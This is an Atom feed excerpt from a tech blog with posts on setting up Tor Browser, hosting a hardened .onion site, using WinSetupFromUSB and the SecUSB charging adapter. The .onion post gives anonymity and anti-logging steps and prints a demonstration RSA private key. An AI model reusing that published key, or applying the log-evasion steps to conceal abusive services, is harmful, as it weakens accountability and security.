<content type="html"><![CDATA[<p>The dark web discussed here means anonymous websites based on Tor.<br><a id="more"></a></p><h2 id="安装-Tor-浏览器"><a href="#安装-Tor-浏览器" class="headerlink" title="安装 Tor 浏览器"></a>Installing Tor Browser</h2><p>Go to the official Tor site <a href="https://www.torproject.org/" target="_blank" rel="noopener">www.torproject.org</a> and download the Tor Browser build for your operating system and language.<br>During installation, just keep clicking Next.</p><h2 id="配置-Tor-浏览器"><a href="#配置-Tor-浏览器" class="headerlink" title="配置 Tor 浏览器"></a>Configuring Tor Browser</h2><p>The first time you open Tor Browser, click Configure.</p><h3 id="网络服务提供商-ISP-是否对-Tor-网络连接进行封锁?"><a href="#网络服务提供商-ISP-是否对-Tor-网络连接进行封锁?" class="headerlink" title="网络服务提供商 (ISP) 是否对 Tor 网络连接进行封锁?"></a>Does your Internet Service Provider (ISP) block connections to the Tor network?</h3><p>Behind the Great Firewall choose "Yes"; otherwise choose according to your own network environment.</p><p><img src="//files.iternull.com/images/2016-01-06_01-0001.png" alt=""></p><h3 id="选择使用集成网桥或输入自定义网桥"><a href="#选择使用集成网桥或输入自定义网桥" class="headerlink" title="选择使用集成网桥或输入自定义网桥"></a>Use the built-in bridges or enter custom bridges</h3><p>The default selection is fine.</p><p><img src="//files.iternull.com/images/2016-01-06_01-0002.png" alt=""></p><h3 id="是否需要本地代理访问互联网"><a href="#是否需要本地代理访问互联网" class="headerlink" title="是否需要本地代理访问互联网"></a>Do you need a local proxy to access the Internet?</h3><p>Choose "Yes" (this is the key step).</p><p><img src="//files.iternull.com/images/2016-01-06_01-0003.png" alt=""></p><h3 id="本地代理配置"><a href="#本地代理配置" class="headerlink" title="本地代理配置"></a>Local proxy configuration</h3><p>The proxy type, address, port and so on depend on the proxy service you use.<br>Shadowsocks is used as the example here.</p><p><img src="//files.iternull.com/images/2016-01-06_01-0004.png" alt=""></p><p>Finally click Connect and wait a moment; with luck you will be connected to the Tor network.</p><h2 id="访问网站"><a href="#访问网站" class="headerlink" title="访问网站"></a>Visiting websites</h2><p>Tor-based anonymous websites use <code>.onion</code> domain names; enter the address in the address bar to visit one. Besides Tor sites, regular websites can be visited too, and that traffic also goes through Tor anonymously.</p><p><img src="//files.iternull.com/images/2016-01-06_01-0005.png" alt=""></p>]]></content>
<summary type="html">
<p>The dark web discussed here means anonymous websites based on Tor.<br>
</summary>
<category term="Tor" scheme="https://blog.iternull.com/tags/Tor/"/>
<category term="Web" scheme="https://blog.iternull.com/tags/Web/"/>
<category term="Tor Browser" scheme="https://blog.iternull.com/tags/Tor-Browser/"/>
</entry>
<entry>
<title>How to Create a Tor .onion Site</title>
<link href="https://blog.iternull.com/posts/2016/01/05/How-to-Create-a-Tor-onion-Site.html"/>
<id>https://blog.iternull.com/posts/2016/01/05/How-to-Create-a-Tor-onion-Site.html</id>
<published>2016-01-05T14:02:38.000Z</published>
<updated>2017-02-11T05:59:18.912Z</updated>
<content type="html"><![CDATA[<p>Tor hidden services use .onion domain names. This post shows how to create a .onion site with a secure configuration that prevents information leaks and keeps the service hidden.<br><a id="more"></a></p><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>Precautions</h2><ul><li>Do not run or do anything else on this server.</li><li>Do a fresh install on a new server or VPS.</li><li>Do not keep or run any services that come from the VPS provider.</li><li>Pay for your VPS with PayPal, though Bitcoin is preferable.</li><li>Do not give the VPS provider any identifying information about yourself.</li><li>Do not run a Tor relay on this server, because a Tor relay's real-world public IP address is publicly listed.</li><li>Do not send email from this server.</li><li>Do not run sloppy or sketchy web software. If your web software has an admin login or admin account, change the password to a complex 26-character password. Many Tor sites have been compromised simply because someone guessed the admin login password.</li><li>Avoid web software that uses JavaScript or similar scripting.</li><li>Make sure your web application does not leak any error messages or identifying information, such as the real public IP address in an error message.</li><li>Audit the web front-end code to make sure it does not pull resources from jquery.com, Google Fonts or any other external service.</li><li>Keep the VPS up to date with security updates.</li></ul><p><strong>This post uses Debian Wheezy, Nginx and Tor to serve the site. Nginx will be configured to listen only for Tor, so it is reachable only through Tor.</strong></p><h2 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h2><p>Install Nginx</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install nginx</span><br></pre></td></tr></table></figure><p>Turn off the Nginx version information</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/nginx/nginx.conf</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">http {</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"> server_tokens off;</span><br><span class="line"></span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>Turn off Nginx logging</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/nginx/nginx.conf</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">http {</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Logging Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> #access_log /var/log/nginx/access.log;</span><br><span class="line"> #error_log /var/log/nginx/error.log;</span><br><span class="line"></span><br><span class="line"> access_log off; # a commented-out access_log still logs to the compiled-in default path</span><br><span class="line"> error_log /dev/null crit;</span><br></pre></td></tr></table></figure><h2 id="配置-Nginx-监听-localhost-8080-端口"><a href="#配置-Nginx-监听-localhost-8080-端口" class="headerlink" title="配置 Nginx 监听 localhost 8080 端口"></a>Configure Nginx to listen on localhost port 8080</h2><p>The default Nginx web root is <code>/usr/share/nginx/www</code>; edit the configuration file to change it.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/nginx/sites-available/default</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">server {</span><br><span class="line"> listen 127.0.0.1:8080 default_server;</span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> root /usr/share/nginx/www;</span><br><span class="line"> index index.html index.htm;</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> allow 127.0.0.1;</span><br><span class="line"> deny all;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h2 id="重启-Nginx"><a href="#重启-Nginx" class="headerlink" title="重启 Nginx"></a>Restart Nginx</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service nginx restart</span><br></pre></td></tr></table></figure><p>Stop and remove <code>rsyslog</code> to turn off system logging</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">service rsyslog stop</span><br><span class="line">apt-get remove --purge rsyslog</span><br></pre></td></tr></table></figure><p>Stop and remove any programs that can be used to send mail (MTAs)</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">service exim stop</span><br><span class="line">service postfix stop</span><br><span class="line">service sendmail stop</span><br><span class="line">apt-get remove --purge exim</span><br><span class="line">apt-get remove --purge postfix</span><br><span class="line">apt-get remove --purge sendmail</span><br></pre></td></tr></table></figure><p>Remove <code>wget</code> so that the server is not harmed if it is hit by a malicious script</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get remove wget</span><br></pre></td></tr></table></figure><p>Disable the Debian version banner shown on SSH connections</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/ssh/sshd_config</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DebianBanner no</span><br></pre></td></tr></table></figure><h2 id="安装-Tor"><a href="#安装-Tor" class="headerlink" title="安装 Tor"></a>Install Tor</h2><p>Add the <code>Debian repo</code> by following the torproject.org documentation <a href="https://www.torproject.org/docs/debian.html.en" target="_blank" rel="noopener">here</a>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install tor</span><br></pre></td></tr></table></figure><h2 id="配置Tor服务"><a href="#配置Tor服务" class="headerlink" title="配置Tor服务"></a>Configure the Tor service</h2><p>Make sure the following lines are set correctly</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/tor/torrc</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HiddenServiceDir /var/lib/tor/hidden_service/</span><br><span class="line">HiddenServicePort 80 127.0.0.1:8080</span><br></pre></td></tr></table></figure><p>Start (or restart) the Tor service</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service tor start</span><br></pre></td></tr></table></figure><p>When Tor starts, it creates a private key and a unique <code>.onion</code> hostname in your <code>HiddenServiceDir</code> directory.</p><p>Here is what these files look like. Of course, you should never expose or display your private key! Keep it secret. The key below is for demonstration and learning purposes only.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">root@debian:~# cd /var/lib/tor/hidden_service/</span><br><span class="line">root@debian:/var/lib/tor/hidden_service# ls</span><br><span class="line">hostname private_key</span><br><span class="line">root@debian:/var/lib/tor/hidden_service# cat private_key </span><br><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIICXAIBAAKBgQC9ymfMgQk12AFT4PXWV+XfmZ1tVDaGajya/jIuwnwtjFdMWe7m</span><br><span class="line">VDWMjs8Z02GGJhH6tIIpoDUrWLi+YchNHlQBi2AnBFzAoSlfRcvobeBAaWuQn+aH</span><br><span class="line">Uzr+xVXOADSIcfgtT5Yd13RKmUEKFV8AO9u652zYP1ss0l+S2mY/J/t/3wIDAQAB</span><br><span class="line">AoGAMjQwcPBRN2UENOP1I9XsgNFpy1nTcor3rShArg3UO1g8X34Kq/Lql1vPfM1l</span><br><span class="line">ps67Qs4tAEXYyraVaAcFrSCwp6MyeKYwxZtT7ki7q3rbMycvbYquxquh0uGy4aed</span><br><span class="line">K8XWjPrUv3yzQSYslOehVWMTH7xTzaOvp5uhpAlHFRqN5MECQQDmpFkXmtfEGwqT</span><br><span class="line">bRbKegRs9siNY6McWBCGrYc/BrpXEiK0j2QcrjC/dMJ4P9O4A94aG4NSI/005fII</span><br><span class="line">vxrOmD9VAkEA0qhBVWeZD7amfvPYChQo0B4ACZZdJlcUd/x1JSOYbVKvRCvJLxjT</span><br><span class="line">5LMwg93jj2m386jXWx8n40Zcus6BTDr6YwJBAKH8E0ZszdVBWLAqEbOq9qjAuiHz</span><br><span class="line">NH+XqiOshCxTwVOdvRorCxjJjhspGdvyl/PJY5facuShuhgI13AlJ+KpMvECQHDJ</span><br><span class="line">l1lzw1bPc2uLgUM8MfHj7h8z+6G4hAQODmaZHVaDK8XzL59gyqqrajFgTyOM9emm</span><br><span class="line">n89w6flcxe9a+41mEoMCQBaM91yvrfp7N9BeDMCHlSDfAzX7sDqQn44ftHvZZI9V</span><br><span class="line">4IouuRuLlqN0iaw4V73v3MUeqXoasmdeZ89bVGhVrC8=</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br><span class="line">root@debian:/var/lib/tor/hidden_service# cat hostname </span><br><span class="line">juyy62wplbkk7gzy.onion</span><br><span class="line">root@debian:/var/lib/tor/hidden_service#</span><br></pre></td></tr></table></figure><h2 id="配置并使用防火墙"><a href="#配置并使用防火墙" class="headerlink" title="配置并使用防火墙"></a>Configure and enable a firewall</h2><p>Enable a firewall and, optionally, allow port 22. If you are a bit more paranoid, do not allow port 22 at all and manage the server only through the provider's control panel console.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt-get install ufw</span><br><span class="line">ufw allow ssh</span><br><span class="line">ufw <span class="built_in">enable</span></span><br></pre></td></tr></table></figure><p>With luck, you should now be able to reach your <code>.onion</code> address; by default it shows the <code>Nginx</code> page.</p><p><img src="//files.iternull.com/images/2016-01-05_01-0001.png" alt=""></p><hr><ul><li>Note: a service set up this way on a host behind the Great Firewall may be unable to connect to the Tor network.</li><li>Original article: <a href="https://scottlinux.com/2013/10/11/how-to-create-a-tor-onion-site/" target="_blank" rel="noopener">https://scottlinux.com/2013/10/11/how-to-create-a-tor-onion-site/</a></li></ul>]]></content>
<summary type="html">
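<p>Tor hidden services use .onion domain names. This post shows how to create a .onion site with a secure configuration that prevents information leaks and keeps the service hidden.<br>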
</summary>
<category term="Tor" scheme="https://blog.iternull.com/tags/Tor/"/>
<category term="onion" scheme="https://blog.iternull.com/tags/onion/"/>
<category term="Web" scheme="https://blog.iternull.com/tags/Web/"/>
</entry>
<entry>
<title>An Introduction to Using WinSetupFromUSB</title>
<link href="https://blog.iternull.com/posts/2015/12/21/WinSetupFromUSB-Introduction.html"/>
<id>https://blog.iternull.com/posts/2015/12/21/WinSetupFromUSB-Introduction.html</id>
<published>2015-12-21T06:08:25.000Z</published>
<updated>2017-02-11T06:01:40.148Z</updated>
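<content type="html"><![CDATA[<p>WinSetupFromUSB is a tool for creating bootable USB drives that hold multiple OS images; it uses Grub4Dos as the boot loader.<br>I previously tried building a multi-OS installation drive with Grub, with poor results: slow loading, garbled screens and crashes, and it could only boot small PE system images.<br><a id="more"></a><br><img src="//files.iternull.com/images/2015-12-21_01-0001.png" alt=""></p><h2 id="下载安装"><a href="#下载安装" class="headerlink" title="下载安装"></a>Download and installation</h2><p>Go to the official <a href="http://www.winsetupfromusb.com/" target="_blank" rel="noopener">WinSetupFromUSB</a> site and download <a href="http://downloads.winsetupfromusb.com/WinSetupFromUSB-1-6.exe" target="_blank" rel="noopener">WinSetupFromUSB 1.6</a>.<br>The download may fail; this is a problem with the website, where the developer left out some page functionality, and you have to extract the download link manually with the browser's developer tools.<br>The download is a self-extracting archive. Run it, extract to the current directory, open the folder, and run the version that matches your system (32-bit or 64-bit).</p><h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>Usage</h2><p>For first use, back up the existing files on the USB drive before formatting it. WinSetupFromUSB detects the USB drive automatically.<br>When creating the boot drive for the first time, remember to tick <code>Auto format it with FBInst</code>. It comes with a number of options; the defaults do not need changing.</p><p><img src="//files.iternull.com/images/2015-12-21_01-0002.png" alt=""></p><p>Under <code>Add to USB disk</code> below, pick the option that matches your OS image and add the image. Each option box takes only one image at a time.</p><p><img src="//files.iternull.com/images/2015-12-21_01-0003.png" alt=""></p><p>The bottom row of options:<br>(Advanced options) advanced settings (do not touch them unless you know what you are doing)<br>(Test in QEMU) test in a QEMU virtual machine<br>(Show Log) view the program's run log</p><p>Finally click <code>GO</code> to start.<br>A <code>job done</code> window pops up when it finishes.</p><p>Adding more OS images: once the boot drive has been created, Grub4Dos is already written to the USB drive. To add images later, do not tick <code>Auto format it with FBInst</code> again; just add the image file in the matching option box and click <code>GO</code> to write it to the drive.</p><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>Other notes</h2><p>The FAT32 file system has a maximum single-file size of <code>4GB</code>. Images larger than 4GB are not a problem: WinSetupFromUSB splits the file into parts by default.</p><p>When adding a Linux image, the advanced options let you create a persistence file, <code>300MB</code> by default. This is simply a file of the given size formatted as <code>ext2</code> that is mounted automatically when the image boots; files you store in it survive a reboot. If the boot drive was made with FAT32 you need not consider using this.</p><p><img src="//files.iternull.com/images/2015-12-21_01-0004.png" alt=""></p><hr><h2 id="链接"><a href="#链接" class="headerlink" title="链接"></a>Links</h2><ul><li>Tutorials: <a href="http://www.winsetupfromusb.com/tutorials/" target="_blank" rel="noopener">http://www.winsetupfromusb.com/tutorials/</a></li><li>FAQ: <a href="http://www.winsetupfromusb.com/faq/" target="_blank" rel="noopener">http://www.winsetupfromusb.com/faq/</a></li></ul>]]></content>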
<summary type="html">
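<p>WinSetupFromUSB is a tool for creating bootable USB drives that hold multiple OS images; it uses Grub4Dos as the boot loader.<br>I previously tried building a multi-OS installation drive with Grub, with poor results: slow loading, garbled screens and crashes, and it could only boot small PE system images.<br>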
</summary>
<category term="WinSetupFromUSB" scheme="https://blog.iternull.com/tags/WinSetupFromUSB/"/>
</entry>
<entry>
<title>How SecUSB Safe Charging Works</title>
<link href="https://blog.iternull.com/posts/2015/09/28/SecUSB-Working-Principle.html"/>
<id>https://blog.iternull.com/posts/2015/09/28/SecUSB-Working-Principle.html</id>
<published>2015-09-28T00:38:29.000Z</published>
<updated>2017-02-11T06:00:43.055Z</updated>
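<content type="html"><![CDATA[<p><img src="//files.iternull.com/images/2015-09-28_01-0001.png" alt=""><br><a id="more"></a><br>To understand how it works, you first need to know what each USB pin does.</p><h2 id="USB引脚"><a href="#USB引脚" class="headerlink" title="USB引脚"></a>USB pins</h2><table><thead><tr><th>Pin</th><th>Name</th><th>Cable color</th><th>Function</th></tr></thead><tbody><tr><td>1</td><td>VCC</td><td>Red</td><td>+5 VDC</td></tr><tr><td>2</td><td>D-</td><td>White</td><td>Data -</td></tr><tr><td>3</td><td>D+</td><td>Green</td><td>Data +</td></tr><tr><td>4</td><td>GND</td><td>Black</td><td>Ground</td></tr></tbody></table><h2 id="USB引脚信号"><a href="#USB引脚信号" class="headerlink" title="USB引脚信号"></a>USB pin signals</h2><p>USB is a serial bus. It uses four shielded wires: two for power (+5V & GND) and two for the differential data signals (labelled D+ and D- in the pinout). Data is sent using the NRZI (Non Return to Zero Invert) encoding scheme with a sync field to synchronize the host and receiver clocks. The <code>Data+</code> and <code>Data-</code> signals on the USB data lines are transmitted over a twisted pair. No termination is needed. Half-duplex differential signalling helps cancel the effect of electromagnetic noise on longer lines.</p><h2 id="安全充电原理"><a href="#安全充电原理" class="headerlink" title="安全充电原理"></a>How safe charging works</h2><p>As shown, ordinary USB has <code>4</code> pins: <code>2</code> carry power and the other <code>2</code> carry data. Disconnecting the data lines therefore isolates the data physically, so a malicious program cannot be transferred from the computer to your phone over USB.<br><img src="//files.iternull.com/images/2015-09-28_01-0002.jpg" alt=""></p><hr><!--Knowing the principle is not much use, though: I do not actually have one. It was said to go on sale on JD.com at the start of the year, but I still have not seen it anywhere, and I am too embarrassed to pester them for one (laughs). Of course you can also make one yourself: solder a USB male connector and a female connector together and wrap them in a plastic shell, though it will certainly not look as nice as SecUSB. When I first heard of SecUSB, developed by 360 for safe charging to stop attackers getting into a phone over USB, I thought it was some fancy black technology (laughs). Now that I have written the principle down, if some shady vendor finds it and mass-produces it, will 360 come after me (laughs)?-->]]></content>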
<summary type="html">
<p><img src="//files.iternull.com/images/2015-09-28_01-0001.png" alt=""><br>
</summary>
<category term="SecUSB" scheme="https://blog.iternull.com/tags/SecUSB/"/>
<category term="USB" scheme="https://blog.iternull.com/tags/USB/"/>
</entry>
</feed>